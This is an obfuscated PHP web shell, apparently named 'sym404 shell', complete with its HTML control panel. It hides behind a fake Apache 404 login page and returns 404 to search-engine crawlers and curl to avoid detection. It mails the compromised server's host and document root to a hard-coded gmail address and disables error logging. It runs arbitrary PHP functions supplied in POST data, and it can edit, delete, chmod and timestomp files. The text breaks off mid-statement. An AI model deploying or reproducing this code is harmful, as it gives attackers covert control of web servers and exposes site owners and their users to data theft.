</html><?php goto zjHKV; UERui: $from_shellcode = "\x6c\x61\x6d\145\162\x40" . gethostbyname($_SERVER["\123\105\122\126\x45\122\137\x4e\101\115\105"]) . ''; goto kUPbE; osRMF: ?>
">CGI</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto g7kGv; Uvvee: ?>
&<?php goto TH0Po; VC6la: function rec($j) { global $GNJ; if (trim(pathinfo($j, PATHINFO_BASENAME), "\x2e") === '') { return; } if ($GNJ[8]($j)) { array_map("\162\x65\143", glob($j . DIRECTORY_SEPARATOR . "\x7b\54\x2e\175\52", GLOB_BRACE | GLOB_NOSORT)); $GNJ[35]($j); } else { $GNJ[10]($j); } } goto vdQRi; lBXOt: echo hex("\x73\171\x6d\x6c\151\x6e\x6b"); goto T94cO; EGDxf: $ruby = exe("\162\165\142\x79\x20\x2d\55\150\145\154\x70") ? "\117\x4e" : "\x4f\106\106"; goto Az_Ax; TEuZb: $server_mail = '' . gethostbyname($_SERVER["\123\x45\122\x56\105\x52\x5f\x4e\x41\x4d\x45"]) . "\40\x20\55\40" . $_SERVER["\110\124\x54\120\x5f\110\x4f\x53\124"] . ''; goto we56n; rTrrL: echo hex($d); goto XD1SR; oRSvi: print OS() === "\127\x69\156\144\x6f\x77\163" ? windisk() : ''; goto NlReM; ioq2X: function usergroup() { if (!function_exists("\x70\x6f\163\x69\170\137\x67\x65\x74\145\147\x69\x64")) { $user["\x6e\x61\x6d\145"] = @get_current_user(); $user["\x75\x69\x64"] = @getmyuid(); $user["\147\151\x64"] = @getmygid(); $user["\x67\x72\157\x75\x70"] = "\x3f"; } else { $user["\165\151\x64"] = @posix_getpwuid(posix_geteuid()); $user["\147\x69\x64"] = @posix_getgrgid(posix_getegid()); $user["\156\x61\x6d\x65"] = $user["\165\x69\144"]["\156\x61\x6d\145"]; $user["\165\151\144"] = $user["\x75\151\x64"]["\165\151\144"]; $user["\147\x72\157\165\x70"] = $user["\x67\151\144"]["\x6e\141\x6d\145"]; $user["\x67\151\x64"] = $user["\147\x69\x64"]["\x67\x69\x64"]; } return (object) $user; } goto wOzaX; u43G3: $pgsql = function_exists("\x70\147\137\143\157\x6e\156\145\143\x74") ? "\x4f\x4e" : "\x4f\106\106"; goto D_eJv; YVf7P: $baslik = "\163\x79\x6d\x34\x30\x34\40\x73\x68\x65\154\x6c\40\x32\60\62\x30\x33"; goto XpLsr; CwgRm: echo hex("\x6d\x61\163\163"); goto zy23N; IIpSk: $wget = exe("\167\147\145\x74\x20\55\55\150\x65\x6c\160") ? "\117\x4e" : "\x4f\106\x46"; goto kYwcm; r0GAq: ?>
<br />
<a class="navbar-brand" href="#">
<img src="//cdn1.iconfinder.com/data/icons/ninja-things-1/1772/ninja-simple-512.png" width="30" height="30" class="d-inline-block align-top auto" alt="Ainz Moe">
</a>
<div class="collapse navbar-collapse" id="navbarNav">
<ul class="navbar-nav">
<li class="nav-item active">
<a class="nav-link ajx" href="?">
<font color="red">Home</font>
</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto t8JQ7; YAiG_: echo hex($d); goto hK4iP; je9LO: echo hex($d); goto bAArr; gEJFa: echo hex($d); goto xdKHP; lAjin: ?>
&<?php goto bl7TV; eyEKQ: mail($kime, $baslik, $EL_MuHaMMeD); goto bwr7D; kf2_2: echo hex("\x6c\x6f\x67\157\165\x74"); goto Lppco; h_b2Z: ?>
">Scanner</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto XduHV; MF5M5: if (isset($_GET["\61"])) { echo $f; } elseif (isset($_GET["\x30"])) { echo $g; } else { NULL; } goto oHFSW; fmkqW: echo hex("\143\x67\x69"); goto osRMF; KKmDN: ?>
">Bypass</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto YAiG_; TH0Po: echo hex("\x73\x63\141\156\x6e\145\x72"); goto h_b2Z; PKgUw: echo "\40\50" . x("{$d}\57{$c}") . "\x29"; goto eA7X7; fXLUQ: @mail($to_email, $server_mail, $linkcr, $header); goto Gyn42; agJfX: $total = hdd(disk_total_space("\57")); goto Jcdc4; sjfgL: echo hex($d); goto UBd5O; u0Uo5: echo hex("\145\x78\x70\x6c\157\151\x74\145\162"); goto mykc0; TAxKP: echo hex($d); goto Uvvee; bl7TV: echo hex("\153\x69\x6c\154\x73\x65\154\x66"); goto T6Zx7; DcThR: $___ = count($Array); goto gKKnj; t8JQ7: echo hex($d); goto ZytAl; uOWNV: $sm = @ini_get(strtolower("\163\141\x66\145\x5f\155\x6f\144\x65")) == "\157\156" ? "\117\116" : "\117\106\x46"; goto NB8Bn; R4JNL: @ini_set("\154\x6f\147\137\145\x72\x72\157\x72\163", 0); goto xGEUJ; Zoa0i: $magicquotes = function_exists("\147\x65\164\x5f\155\x61\x67\151\143\137\x71\x75\x6f\164\x65\x73\x5f\147\160\x63") ? "\117\x4e" : "\x4f\106\106"; goto T7IMq; DmamT: echo hex("\x62\171\160\x61\163\x73"); goto KKmDN; qlmbl: @ini_set("\145\x72\x72\157\162\x5f\x6c\157\147", NULL); goto R4JNL; Jcdc4: $used = $total - $freespace; goto J1Qf_; EnY30: session_start(); goto wpjyr; yz2gd: $c_ = "\x3c\57\164\x64\76\12\11\11\11\11\x9\11\x9\x3c\x2f\164\162\76\xa\11\x9\x9\11\x9\11\74\57\164\142\x6f\144\171\x3e\xa\11\11\11\x9\11\x3c\57\164\141\142\x6c\145\76"; goto nzSNF; nzSNF: $d_ = "\74\x62\162\40\57\76\12\x9\11\x9\11\x9\11\x9\x9\11\11\74\142\162\40\57\76\12\11\x9\x9\x9\11\11\11\11\11\x9\x3c\151\x6e\x70\165\164\x20\x74\x79\160\145\75\42\x73\165\142\x6d\x69\x74\42\40\143\154\141\x73\163\x3d\42\146\157\x72\x6d\55\143\x6f\156\164\162\x6f\x6c\40\143\157\154\55\x6d\144\x2d\63\42\40\x76\x61\154\165\145\x3d\x22\46\x6e\x62\x73\x70\x3b\117\113\x26\x6e\142\163\x70\73\42\40\57\x3e\12\x9\11\x9\x9\x9\11\x9\11\x9\74\x2f\x66\157\x72\x6d\x3e"; goto Hdh5S; RrubB: $ip_remote = $_SERVER["\122\105\x4d\117\124\105\137\101\x44\x44\x52"]; goto UERui; ACUF3: ?>
&<?php goto PeNk_; k4jQM: $EL_MuHaMMeD .= "\123\x65\x72\166\x65\162\40\x69\x73\154\x65\x74\151\x6d\40\163\151\163\164\x65\x6d\151\40\x3a\40" . $_SERVER["\123\105\122\x56\105\122\x5f\x53\x4f\x46\x54\127\101\122\x45"] . "\15\12"; goto nLmNr; ZytAl: ?>
&<?php goto hHXpc; eg14O: ?>
">Info</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto RKF2n; WYkCI: function x($c) { global $GNJ; $x = $GNJ[24]($c); if (($x & 49152) == 49152) { $u = "\x73"; } elseif (($x & 40960) == 40960) { $u = "\154"; } elseif (($x & 32768) == 32768) { $u = "\55"; } elseif (($x & 24576) == 24576) { $u = "\x62"; } elseif (($x & 16384) == 16384) { $u = "\144"; } elseif (($x & 8192) == 8192) { $u = "\x63"; } elseif (($x & 4096) == 4096) { $u = "\160"; } else { $u = "\x75"; } $u .= $x & 256 ? "\x72" : "\55"; $u .= $x & 128 ? "\x77" : "\55"; $u .= $x & 64 ? $x & 2048 ? "\x73" : "\170" : ($x & 2048 ? "\123" : "\55"); $u .= $x & 32 ? "\x72" : "\55"; $u .= $x & 16 ? "\x77" : "\55"; $u .= $x & 8 ? $x & 1024 ? "\163" : "\x78" : ($x & 1024 ? "\x53" : "\x2d"); $u .= $x & 4 ? "\162" : "\x2d"; $u .= $x & 2 ? "\x77" : "\55"; $u .= $x & 1 ? $x & 512 ? "\x74" : "\170" : ($x & 512 ? "\x54" : "\x2d"); return $u; } goto Sl_IC; wt7eq: @ini_set("\157\165\x74\x70\165\x74\137\142\x75\x66\146\145\x72\151\x6e\x67", 0); goto SEdNH; PeNk_: echo hex("\143\x6f\x6e\146\x69\147"); goto HxZ4H; zy23N: ?>
">Mass Tools</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto gEJFa; ji2w1: function login_shell() { ?>
<!DOCTYPE HTML>
<html>
<head>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache Server at <?php echo $_SERVER["\110\x54\x54\120\x5f\x48\x4f\123\124"]; ?>
Port 80</address>
<style>
input {
margin: 0;
background-color: #fff;
border: 1px solid #fff;
text-align: center;
}
</style>
<br><br><br><br><br>
<form method="post">
<center>
<input type="password" name="password" autocomplete="off">
</form>
</center>
<?php die; } goto z99GC; Lppco: ?>
">
<font color="red">Logout</font>
</a>
</li>
</ul>
</div>
<a class="navbar-brand" href="#">
<img src="//cdn1.iconfinder.com/data/icons/ninja-things-1/1772/ninja-simple-512.png" width="30" height="30" class="d-inline-block align-top auto" alt="Ainz Moe">
</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
</nav>
</div>
<?php goto nr5UH; Uca8b: ?>
">Auto Tools</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto TAxKP; mykc0: ?>
">Exploiter</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto sjfgL; MHSBI: function ambilKata($param, $kata1, $kata2) { if (strpos($param, $kata1) === FALSE) { return FALSE; } if (strpos($param, $kata2) === FALSE) { return FALSE; } $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } goto qH131; CdAia: if (!empty($_SERVER["\110\124\x54\x50\137\125\x53\105\x52\x5f\x41\107\x45\116\x54"])) { $userAgents = array("\107\157\157\147\154\x65\x62\x6f\164", "\x53\154\x75\162\x70", "\x4d\x53\116\102\x6f\x74", "\120\x79\x63\125\122\114", "\x66\141\143\145\x62\157\x6f\153\145\170\x74\145\x72\156\x61\154\150\151\x74", "\151\x61\x5f\141\162\143\150\x69\166\x65\162", "\x63\x72\141\x77\x6c\x65\162", "\x59\141\x6e\144\x65\x78", "\122\x61\x6d\142\x6c\x65\162", "\131\x61\x68\157\157\x21\x20\123\x6c\165\x72\160", "\131\x61\x68\157\x6f\x53\145\145\x6b\x65\162", "\142\x69\156\x67\142\157\x74", "\143\x75\162\x6c"); if (preg_match("\57" . implode("\174", $userAgents) . "\57\x69", $_SERVER["\110\x54\x54\120\x5f\125\x53\x45\122\137\101\x47\x45\x4e\x54"])) { header("\110\x54\124\120\x2f\61\x2e\60\x20\x34\x30\x34\40\116\157\x74\40\106\157\x75\x6e\x64"); die; } } goto T4ghk; jOvHV: echo "\x3c\x62\162\x3e\103\x75\162\162\x65\156\x74\x20\104\151\x72\x65\143\x74\157\x72\171\x20\x3a\40"; goto PMPzS; MNnsd: $Array = array("\x37\x30\66\x38\67\x30\x35\146\x37\65\x36\145\x36\61\x36\x64\66\65", "\67\x30\66\70\67\x30\67\x36\x36\x35\x37\x32\67\x33\66\x39\66\146\66\x65", "\66\63\x36\x38\x36\64\66\71\67\62", "\x36\x37\x36\65\67\64\x36\63\x37\x37\x36\x34", "\67\60\67\62\x36\65\x36\67\x35\146\x37\x33\67\60\66\143\x36\x39\67\x34", "\66\63\x36\x66\x37\x30\x37\71", "\66\x36\66\x39\66\143\66\x35\65\x66\66\67\66\x35\67\64\x35\x66\66\63\66\146\66\x65\67\64\66\x35\x36\x65\x37\x34\67\x33", "\x36\62\66\61\x37\x33\66\x35\x33\x36\x33\64\x35\146\x36\x34\66\x35\66\x33\66\146\x36\64\66\65", "\66\x39\x37\x33\x35\146\x36\64\x36\71\67\62", "\66\x66\66\x32\65\146\66\65\66\145\x36\64\65\x66\x36\x33\66\x63\66\65\x36\x31\66\145\62\70\x32\71\63\142", "\x37\x35\x36\145\66\143\66\x39\x36\x65\x36\142", "\x36\144\x36\142\66\64\x36\x39\x37\62", "\x36\x33\x36\x38\x36\144\66\146\x36\64", "\x37\63\66\x33\66\x31\66\145\66\x34\x36\71\x37\x32", "\67\x33\67\64\67\62\x35\146\67\x32\66\x35\x37\x30\66\x63\66\x31\66\x33\x36\65", "\66\x38\67\64\66\144\66\143\67\63\67\x30\x36\x35\x36\63\x36\71\x36\61\x36\x63\66\63\66\70\66\61\x37\62\x37\63", "\x37\66\x36\x31\67\62\65\x66\66\x34\67\65\x36\x64\x37\x30", "\66\66\66\146\67\x30\x36\65\x36\x65", "\66\66\x37\x37\67\62\66\71\x37\x34\66\65", "\66\x36\66\x33\66\143\66\x66\x37\x33\66\65", "\x36\x34\x36\61\x37\64\66\x35", "\66\x36\66\71\66\x63\66\x35\66\x64\67\64\66\x39\x36\x64\x36\65", "\x37\63\x37\x35\66\x32\67\x33\67\x34\x37\x32", "\x37\63\67\60\x37\62\66\71\x36\145\67\64\66\66", "\x36\66\x36\x39\x36\x63\x36\x35\67\60\66\65\67\x32\x36\144\67\63", "\x37\64\x36\x66\x37\x35\x36\x33\x36\x38", "\x36\66\x36\x39\66\x63\x36\x35\65\146\66\x35\67\70\66\x39\67\63\67\64\67\63", "\x37\62\66\65\x36\x65\x36\x31\x36\144\66\x35", "\x36\x39\67\63\x35\x66\66\x31\x37\x32\x37\62\x36\x31\x37\71", "\x36\71\x37\x33\65\146\66\146\x36\x32\66\141\x36\65\66\63\67\64", "\67\63\x37\x34\x37\62\x37\x30\66\146\67\x33", "\x36\71\67\x33\x35\146\x37\x37\67\x32\66\x39\x37\64\x36\x31\x36\x32\66\x63\x36\65", "\66\71\x37\63\x35\x66\x37\x32\66\65\x36\61\66\x34\66\61\x36\62\66\143\66\x35", "\67\x33\67\x34\67\x32\67\64\x36\x66\x37\x34\x36\71\66\x64\x36\x35", "\66\66\66\x39\66\143\x36\x35\67\x33\66\x39\67\x61\x36\65", "\67\62\66\x64\66\x34\66\71\x37\x32", "\66\x66\x36\62\65\146\66\x37\x36\65\67\64\x35\146\66\x33\x36\x63\x36\65\66\x31\66\145", "\67\x32\66\x35\x36\x31\66\x34\x36\66\66\x39\x36\x63\x36\65", "\66\x31\x37\63\x37\63\x36\x35\67\x32\67\64"); goto DcThR; vdQRi: function dre($y1, $y2) { global $GNJ; ob_start(); $GNJ[16]($y1($y2)); return $GNJ[36](); } goto jCWj1; J1Qf_: function path() { if (isset($_GET["\x64\151\x72"])) { $dir = str_replace("\134", "\57", $_GET["\x64\x69\162"]); @chdir($dir); } else { $dir = str_replace("\x5c", "\57", getcwd()); } return $dir; } goto HwInW; xGEUJ: @ini_set("\x6d\x61\x78\137\x65\170\x65\143\165\x74\x69\x6f\156\137\164\151\x6d\x65", 0); goto wt7eq; SlGCP: ?>
&<?php goto DmamT; B83al: echo hex("\x61\x62\x6f\165\x74"); goto u8eDX; Rw_Vq: function hdd($s) { if ($s >= 1073741824) { return sprintf("\x25\x31\x2e\x32\146", $s / 1073741824) . "\40\x47\x42"; } elseif ($s >= 1048576) { return sprintf("\45\x31\x2e\x32\146", $s / 1048576) . "\x20\115\x42"; } elseif ($s >= 1024) { return sprintf("\x25\61\x2e\x32\146", $s / 1024) . "\x20\x4b\x42"; } else { return $s . "\x20\x42"; } } goto Bo2yb; XpLsr: $EL_MuHaMMeD = "\104\x6f\x73\171\x61\x20\131\157\x6c\165\x20\72\x20" . $_SERVER["\x44\x4f\x43\125\115\105\x4e\124\137\x52\x4f\117\x54"] . "\15\xa"; goto QTE_S; Pjama: error_reporting(0); goto d2RdT; mkR7V: echo hex($d); goto olU8v; u8eDX: ?>
">About Us</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto R4ec1; Az_Ax: $mssql = function_exists("\x6d\163\163\x71\x6c\137\x63\x6f\x6e\156\x65\143\x74") ? "\117\x4e" : "\117\106\106"; goto u43G3; Ogzh2: $f = $o_[0] . "\123\x75\x63\143\x65\x73\163\41" . $o_[1]; goto HF7pj; n2Ago: if (version_compare(PHP_VERSION, "\65\x2e\63\x2e\60", "\74")) { @set_magic_quotes_runtime(0); } goto CdAia; gjCiw: function ER() { global $GNJ, $d; $GNJ[38]($GNJ[9]); header("\114\157\143\141\x74\151\x6f\156\x3a\40\77\144\x3d" . hex($d) . "\46\60"); die; } goto WYkCI; kUPbE: $to_email = "\x6c\157\x67\151\x6e\157\x6c\144\x75\x6d\100\x67\x6d\x61\x69\154\56\143\157\155"; goto TEuZb; dUjt0: $show_include = !empty($safemode_include_dir) ? "\x4f\106\x46" : "\117\116"; goto HN1nt; KYwN6: $k = $GNJ[4]("\x2f\50\x5c\x5c\x7c\x5c\57\x29\x2f", $d); goto r0GAq; D_eJv: $python = exe("\x70\171\x74\x68\157\x6e\x20\x2d\x2d\x68\145\154\160") ? "\117\116" : "\x4f\106\106"; goto Zoa0i; mZ52w: $show_ds = !empty($ds) ? "{$ds}" : "\101\154\x6c\40\106\165\x6e\x63\164\151\x6f\x6e\x73\40\111\163\x20\101\143\143\x65\163\163\151\142\x6c\x65"; goto b5jeo; zjHKV: $time_shell = '' . date("\144\57\x6d\x2f\131\40\x2d\x20\110\x3a\x69\72\163") . ''; goto RrubB; hHXpc: echo hex("\151\x6e\146\x6f"); goto eg14O; NlReM: echo "\74\x62\162\x3e\74\142\x72\76"; goto C683H; Hdh5S: if (isset($_GET["\x73"])) { echo $a_ . uhex($_GET["\163"]) . $b_ . "\12\x9\x9\11\x9\11\11\x9\x9\11\74\x74\145\x78\164\141\x72\145\x61\x20\162\x65\141\x64\x6f\x6e\154\x79\40\143\x6c\141\x73\163\x20\75\x20\x22\x66\157\162\x6d\55\143\157\156\x74\162\157\154\x22\x3e" . $GNJ[15]($GNJ[6](uhex($_GET["\163"]))) . "\74\x2f\x74\x65\170\x74\x61\x72\145\141\x3e\12\x9\x9\11\x9\x9\x9\x9\x9\x9\x3c\142\162\40\x2f\76\xa\11\x9\x9\x9\11\11\x9\x9\x9\74\142\x72\x20\57\x3e\12\x9\x9\11\11\11\11\11\x9\x9\x3c\151\x6e\x70\165\164\x20\x6f\156\x63\154\x69\143\153\75\42\154\x6f\143\x61\x74\151\x6f\x6e\56\150\162\145\x66\x3d\47\77\144\x3d" . $_GET["\144"] . "\46\145\x3d" . $_GET["\163"] . "\x27\42\x20\x74\x79\160\x65\x3d\42\163\x75\142\x6d\151\164\x22\40\x63\x6c\141\x73\163\x3d\x22\146\x6f\x72\155\55\143\157\156\164\162\157\x6c\40\x63\x6f\154\x2d\x6d\x64\x2d\63\x22\40\166\x61\154\165\145\75\42\46\x6e\x62\x73\160\x3b\105\x44\111\124\46\x6e\142\163\x70\73\42\x20\x2f\x3e\xa\11\11\11\11\11\x9\x9\11" . $c_; } elseif (isset($_GET["\171"])) { echo $a_ . "\122\105\x51\x55\105\x53\x54" . $b_ . "\12\x9\x9\11\x9\11\x9\x9\x9\11\74\x66\157\162\155\x20\x6d\x65\164\150\157\144\x3d\x22\x70\x6f\x73\164\42\76\xa\x9\11\11\x9\x9\11\x9\x9\11\11\x3c\151\156\160\x75\x74\40\x63\x6c\141\x73\x73\75\42\146\157\x72\155\x2d\143\157\156\x74\162\x6f\x6c\40\x6d\x64\x2d\63\42\x20\164\171\x70\145\75\42\x74\x65\170\x74\x22\x20\x6e\141\155\x65\x3d\42\x31\x22\x20\141\x75\164\157\x63\x6f\x6d\x70\154\x65\164\145\x3d\42\x6f\x66\146\42\x20\x2f\76\x26\156\x62\163\160\73\x26\x6e\x62\163\160\73\xa\x9\x9\11\11\x9\11\x9\11\x9\11\x3c\x69\x6e\160\x75\x74\40\143\154\141\x73\x73\x3d\x22\x66\x6f\x72\155\55\143\x6f\156\x74\x72\157\154\40\x6d\x64\x2d\x33\x22\40\164\171\x70\x65\75\x22\x74\145\170\x74\x22\40\x6e\141\155\145\x3d\x22\x32\x22\40\141\165\164\x6f\x63\157\x6d\160\154\145\164\x65\75\x22\157\146\x66\42\40\57\76\12\x9\11\11\x9\11\11\11\x9\11\11" . $d_ . "\xa\11\11\11\x9\11\11\11\x9\x9\74\x62\162\x20\x2f\76\xa\x9\11\11\11\x9\11\11\x9\x9\74\x74\145\170\x74\141\162\x65\x61\x20\162\x65\141\x64\x6f\x6e\x6c\171\x20\x63\x6c\141\163\163\x20\75\40\x22\146\157\162\x6d\55\x63\157\156\x74\162\157\154\x22\x3e"; if (isset($_POST["\x32"])) { echo $GNJ[15](dre($_POST["\61"], $_POST["\x32"])); } echo "\x3c\57\164\145\x78\164\141\x72\145\x61\76\12\x9\x9\11\11\x9\x9\11\11" . $c_; } elseif (isset($_GET["\x65"])) { echo $a_ . uhex($_GET["\x65"]) . $b_ . "\xa\x9\11\x9\x9\11\x9\x9\11\11\x3c\x66\157\x72\x6d\40\155\x65\164\x68\x6f\x64\75\42\x70\157\x73\x74\42\76\xa\11\11\x9\x9\x9\11\11\x9\x9\x9\x3c\164\145\x78\164\x61\162\x65\141\x20\156\141\155\145\x3d\42\145\42\x20\143\154\x61\x73\x73\75\42\x66\x6f\x72\155\x2d\143\x6f\x6e\x74\x72\x6f\154\42\x3e" . $GNJ[15]($GNJ[6](uhex($_GET["\145"]))) . "\74\x2f\164\x65\170\x74\x61\x72\x65\141\76\xa\x9\11\11\x9\11\x9\11\x9\x9\x9\x3c\142\162\x20\57\x3e\12\11\x9\11\x9\x9\11\11\x9\x9\11\74\x62\162\x20\57\76\12\x9\x9\11\x9\x9\11\x9\11\x9\11\x3c\x73\x70\141\156\x20\143\x6c\x61\163\163\x3d\42\x77\42\x3e\102\x41\x53\x45\66\x34\74\x2f\x73\x70\141\x6e\x3e\x20\72\12\11\11\x9\11\11\x9\11\11\11\x9\x3c\143\x65\156\164\x65\162\76\x3c\163\145\154\x65\x63\x74\x20\x69\144\x3d\42\142\x36\x34\42\x20\156\141\155\x65\75\x22\142\x36\64\x22\x20\x63\154\x61\163\x73\x20\x3d\x20\42\146\x6f\x72\x6d\55\143\x6f\x6e\x74\x72\157\154\x20\143\157\154\55\155\144\x2d\63\42\x3e\xa\x9\11\x9\11\11\11\11\11\11\11\x9\74\157\160\164\151\x6f\x6e\40\166\141\154\165\145\x3d\x22\x30\42\76\x4e\117\74\x2f\157\160\164\151\x6f\x6e\76\12\11\x9\11\x9\11\11\11\x9\x9\11\11\74\x6f\160\164\151\x6f\156\40\x76\141\154\x75\145\75\x22\61\x22\x3e\131\x45\123\74\x2f\x6f\160\x74\151\x6f\x6e\76\12\11\x9\x9\x9\x9\x9\x9\x9\x9\11\x3c\x2f\163\145\154\x65\x63\164\76\x3c\x2f\143\145\x6e\164\145\x72\76\12\11\x9\11\11\11\x9\x9\x9\11\x9" . $d_ . "\xa\11\x9\11\11\x9\x9\x9\x9" . $c_ . "\xa\11\x9\x9\x9\11\x9\x9\11\12\x9\11\11\x9\x9\74\163\143\x72\151\x70\x74\76\12\11\11\x9\11\x9\11\44\x28\42\x23\x62\x36\x34\x22\x29\56\x63\150\x61\156\147\145\x28\146\165\x6e\x63\x74\151\x6f\x6e\50\x29\x20\173\12\11\x9\x9\x9\x9\x9\11\151\146\50\44\50\42\x23\x62\x36\64\40\x6f\x70\x74\151\157\156\x3a\x73\145\154\x65\143\x74\145\x64\42\x29\56\166\x61\154\50\x29\40\75\75\40\x30\51\40\x7b\xa\x9\x9\x9\x9\x9\11\x9\11\x76\141\162\x20\x58\x20\75\40\x24\50\42\164\145\x78\x74\x61\162\145\141\42\x29\x2e\166\141\154\50\51\x3b\xa\x9\11\x9\x9\x9\11\11\11\166\x61\162\40\132\40\x3d\40\141\x74\157\x62\50\x58\x29\x3b\xa\11\11\x9\x9\11\11\x9\11\44\50\42\164\x65\170\x74\x61\162\145\141\x22\x29\x2e\x76\x61\x6c\50\x5a\x29\x3b\12\11\11\11\11\11\x9\x9\x7d\xa\11\11\11\x9\x9\x9\x9\x65\x6c\163\145\40\173\xa\11\x9\x9\11\11\x9\11\11\166\141\x72\40\x4e\40\x3d\40\44\50\42\x74\x65\x78\x74\141\x72\145\141\42\51\56\x76\x61\154\50\51\x3b\xa\x9\11\11\x9\11\x9\11\11\x76\141\x72\40\x49\40\x3d\40\x62\x74\x6f\141\50\x4e\x29\73\12\x9\11\11\x9\11\x9\x9\11\44\x28\x22\x74\145\x78\x74\x61\162\145\141\42\x29\56\x76\x61\x6c\x28\x49\x29\73\xa\11\11\11\11\x9\x9\11\x7d\12\11\11\11\x9\11\x9\175\51\x3b\xa\x9\11\11\11\x9\x3c\x2f\163\x63\162\151\160\164\76"; if (isset($_POST["\x65"])) { if ($_POST["\142\66\x34"] == "\x31") { $ex = $GNJ[7]($_POST["\x65"]); } else { $ex = $_POST["\145"]; } $fp = $GNJ[17](uhex($_GET["\145"]), "\x77"); if ($GNJ[18]($fp, $ex)) { OK(); } else { ER(); } $GNJ[19]($fp); } } elseif (isset($_GET["\x78"])) { rec(uhex($_GET["\170"])); if ($GNJ[26](uhex($_GET["\170"]))) { ER(); } else { OK(); } } elseif (isset($_GET["\x74"])) { echo $a_ . uhex($_GET["\164"]) . $b_ . "\xa\11\x9\x9\x9\x9\11\11\x9\x9\x3c\x66\x6f\162\155\40\x61\x63\x74\151\157\156\x3d\42\42\40\x6d\145\x74\x68\x6f\x64\x3d\42\160\157\163\164\42\x3e\xa\x9\x9\x9\x9\x9\11\11\11\11\11\x3c\151\156\160\x75\x74\x20\x6e\x61\155\145\x3d\x22\164\x22\x20\143\154\x61\x73\163\75\42\x66\157\162\155\55\x63\x6f\x6e\164\162\157\154\x20\x63\157\x6c\55\x6d\x64\55\x33\x22\x20\141\x75\164\157\143\x6f\155\x70\154\145\164\145\x3d\42\x6f\146\146\x22\x20\164\x79\160\145\75\x22\x74\x65\x78\x74\x22\x20\166\141\x6c\x75\x65\75\x22" . $GNJ[20]("\131\x2d\x6d\x2d\144\x20\110\x3a\151", $GNJ[21](uhex($_GET["\164"]))) . "\42\x3e\12\11\11\x9\11\x9\11\x9\x9\11\11" . $d_ . "\12\11\x9\11\x9\11\x9\11\x9" . $c_; if (!empty($_POST["\x74"])) { $p = $GNJ[33]($_POST["\x74"]); if ($p) { if (!$GNJ[25](uhex($_GET["\x74"]), $p, $p)) { ER(); } else { OK(); } } else { ER(); } } } elseif (isset($_GET["\x6b"])) { echo $a_ . uhex($_GET["\153"]) . $b_ . "\xa\11\11\x9\11\11\11\11\11\x9\x3c\x66\157\162\155\x20\141\x63\x74\x69\x6f\x6e\75\x22\42\40\155\x65\x74\150\x6f\x64\x3d\x22\160\157\163\164\x22\76\12\x9\11\11\x9\11\x9\x9\x9\11\11\74\x69\x6e\x70\x75\x74\x20\x6e\x61\155\x65\x3d\x22\142\x22\x20\141\165\x74\157\143\x6f\155\x70\x6c\145\x74\x65\x3d\x22\x6f\146\x66\x22\x20\143\x6c\x61\x73\x73\x3d\x22\x66\x6f\x72\155\x2d\x63\157\156\164\162\x6f\x6c\x20\143\x6f\154\x2d\155\x64\55\x33\42\x20\x74\x79\160\145\75\x22\164\145\x78\164\42\40\x76\x61\154\x75\145\75\x22" . $GNJ[22]($GNJ[23]("\45\x6f", $GNJ[24](uhex($_GET["\x6b"]))), -4) . "\x22\76\12\x9\11\11\11\x9\x9\11\x9\x9\x9" . $d_ . "\12\11\x9\x9\11\11\11\x9\x9" . $c_; if (!empty($_POST["\142"])) { $x = $_POST["\142"]; $t = 0; for ($i = strlen($x) - 1; $i >= 0; --$i) { $t += (int) $x[$i] * pow(8, strlen($x) - $i - 1); } if (!$GNJ[12](uhex($_GET["\x6b"]), $t)) { ER(); } else { OK(); } } } elseif (isset($_GET["\154"])) { echo $a_ . "\53\x44\111\122" . $b_ . "\xa\x9\x9\11\x9\11\11\11\11\11\74\x66\x6f\162\155\40\x61\x63\x74\151\x6f\156\x3d\42\x22\x20\x6d\145\164\150\157\x64\75\x22\160\157\163\164\x22\x3e\xa\x9\x9\11\x9\11\11\11\11\11\11\x3c\x69\x6e\160\165\x74\40\156\141\x6d\x65\x3d\42\x6c\42\40\141\165\x74\157\x63\x6f\x6d\160\x6c\145\164\145\x3d\x22\x6f\x66\146\42\40\x63\x6c\141\163\163\x3d\42\146\x6f\162\x6d\x2d\143\157\156\164\x72\157\x6c\40\143\157\x6c\x2d\155\x64\55\63\42\40\x74\x79\160\x65\75\42\164\145\170\164\x22\40\x76\x61\154\165\x65\75\x22\42\x3e\xa\11\11\x9\11\11\11\11\11\x9\x9" . $d_ . "\12\11\11\11\x9\11\11\x9\11" . $c_; if (isset($_POST["\x6c"])) { if (!$GNJ[11]($_POST["\154"])) { ER(); } else { OK(); } } } elseif (isset($_GET["\x71"])) { if ($GNJ[10](__FILE__)) { $GNJ[38]($GNJ[9]); header("\x4c\x6f\143\141\x74\x69\157\156\72\x20" . basename($_SERVER["\120\110\120\137\123\x45\114\106"]) . ''); die; } else { echo $g; } } elseif (isset($_GET[hex("\151\x6e\146\157")])) { echo "\x3c\x68\x72\x3e\x53\131\x53\x54\x45\x4d\40\x49\x4e\106\x4f\122\x4d\x41\124\111\x4f\x4e\x3c\143\x65\156\164\x65\x72\76\12\x9\x9\x9\x9\11\x9\x3c\164\145\170\x74\141\x72\145\141\40\x63\154\x61\163\x73\x20\75\40\x22\x66\157\162\155\55\143\157\156\164\x72\157\x6c\x22\40\x72\145\141\x64\157\156\154\x79\76\xa\x9\11\11\x9\11\11\12\11\x9\x9\123\x65\162\x76\145\162\x20\11\11\11\11\x9\x3a\x20" . $_SERVER["\x48\124\x54\120\137\x48\117\x53\x54"] . 